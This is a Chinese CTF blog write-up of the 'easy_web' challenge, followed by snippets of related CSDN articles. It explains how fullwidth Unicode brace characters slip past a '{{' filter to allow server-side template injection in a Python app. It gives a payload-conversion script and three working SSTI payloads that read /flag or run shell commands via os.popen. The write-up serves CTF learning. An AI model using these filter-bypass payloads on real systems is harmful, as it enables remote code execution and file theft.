CTF之easy_web

于 2024-03-26 23:32:28 发布
阅读量166 收藏
点赞数 3
分类专栏: ctf 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/137060726
版权

打开网站就一个输入框,按理来说这种类型就是注入类型的漏洞了,至于什么注入还不知道

尝试了目录遍历以及漏洞扫描但是没有什么卵用,抓了一下包发现是python,所以考虑一下SSTI注入

但是好像{{}}被过滤了。

通过符号列表进行爆破,发现  / 也被过滤了,但是 ︷ 会被解析成 { ,︸ 会被解析成 }

然后就可以进行SSTI注入了

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> '
, -> ,
" -> "
"""



#str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
str='{{().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open'](\'/flag\').read()}}'

#︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸


str = str.replace('{', '︷')

str = str.replace('}', '︸')

str = str.replace('\'',''' )

str = str.replace('\"', '"')



print(str)

 下面是可以注入的ssti

︷︷().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸

︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸

︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")︸︸

得到flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}

小黑子不会打篮球
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf_web_kmipn
05-06
用户 用户 密码 Sandiuser Sandiuser
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
BUUCTF WEB easy_web
qq_41696858的博客
12-17 971
打开场景,发现一个img参数和cmd命令,结合上一题的思路,也猜是任意文件读取? img这东西看着就像base64,解码一次,得到一个等号,没跑了,再次base64解码,得到一个 3535352e706e67,像是一个16进制数 转字符串看看555.png 好了,大功告成,读源码去喽 index.php转16进制696e6465782e706870 16进制一次base64编码 Njk2ZTY0NjU3ODJlNzA2ODcw 再次base64 TmprMlpUWTBOalUzT0RKbE56QTJPRGN
CTF_平台练习
qq_59826623的博客
09-17 198
把index.php用base64编码两次、hex编码一次,输入到url参数中,即可查看本题源码,进行分析。因为在源码中可以看到过滤了flag所以需要使用f*来查看。目录穿越去访问根目录下的flag。同时传递参数的位置是通过get方式传递pop的参数值。此处交由chatgpt进行分析,以下是他的回答。发现应该不是当前目录下的flag.php文件。很简单,直接上蚁剑,在根目录下查看flag。滑到页面底部找到flag。尝试sqlmap跑一手。linux系统,尝试。根据用户名提示登录网页。读取flag.php。
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 4341
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
CTF—web题库笔记(难度4)
cocoaiu的博客
08-13 5339
CTF—web题库笔记(41-50)
CTF】加密3——easy_crypto+简单加密+散乱的密文
weixin_44063560的博客
02-15 1569
easy_crypto 初看这道题,着实有点懵。 尝试了一下2进制,但是最终还是失败了(起初没注意中间的空格…) 后来想到可能是电码,转而想到摩斯密码。(0代表. 1代表—) 之后一点点对照翻译得到flag ————————————————————————————————————————————— 简单加密 这里看到最后的AA让人不禁浮想联翩,强行想到 “==”,再加上这串符号里有除了...
CTF-BUUCTF-Web-EasySQL
qq_42404383的博客
12-30 3421
CTF-BUUCTF-Web-EasySQL 如题: 解题思路: EasySQL 新手恶补: 什么是SQL注入? SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还...
攻防世界-web- easyphp
32bin的博客
10-30 1192
最近在学习CTF web相关知识,顺带学习php,在攻防世界平台上做做题。遇到了一道名为easyphp的题目,对我这个新手一点也不easy,于是决定把过程记录下来。版权声明:本文为CSDN博主「weixin_46906325」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_46906325/article/details/127154789。#攻防世界-web- easyphp。依次构造a、b、c的值!
buuctf-[安洵杯 2019]easy_web(小宇特详解)
小宇的web博客
02-16 2798
buuctf-[安洵杯 2019]easy_web(小宇特详解) 这里查看题目 这里在url里发现了img传参还有cmd 这里先从img传参入手,这里我发现img传参好像是base64的样子 进行解码,解码之后还像是base64的样子再次进行解码 3535352e706e67 这个数好像是16进制的,进行16进制转换成字符串 555.png 这里利用这个原理,先将index.php16进制编码,然后进行两次base64编码 TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 base64解
【青少年CTF】“Flag在哪里?”解题记录
qq_64868579的博客
06-04 1266
例如“Flag在哪里?青少年CTF训练平台:www.qsnctf.com。复制以后选择其中qsnctf{}部分提交即可。第一反应就是查看网页源代码寻找flag。描述中并没有给出什么有用的信息。博主用户名:Fourstar.一般来讲有关于直接问Flag的。开启Game-Box题目环境。但是右键或者选中都没有用。所以直接F12进入检查。
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF-easy_php
m0_62593857的博客
02-01 548
ctf-easy_php
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1102
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1178
[极客大挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
青少年CTF - Web - Flag在哪里 Wp WriteUp
zxsctf的博客
10-01 3931
在标签中的title标签下方,就有被注释的flag。flag是动态的哦,同学们要自己好好做题!启动环境,需要等待大概20秒左右的时间。访问,页面显示Flag反正不在这。平台名称:青少年CTF训练平台。右键网页,发现无法使用右键。题目名称:Flag在哪里?
ctf.show_web9
最新发布
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令注入到URL中,从而执行系统命令,读取配置文件中的flag。其中,引用提供了一个读取配置文件的payload,而引用则是ffifdyop的MD5加密结果,可能是某个关键信息的加密结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值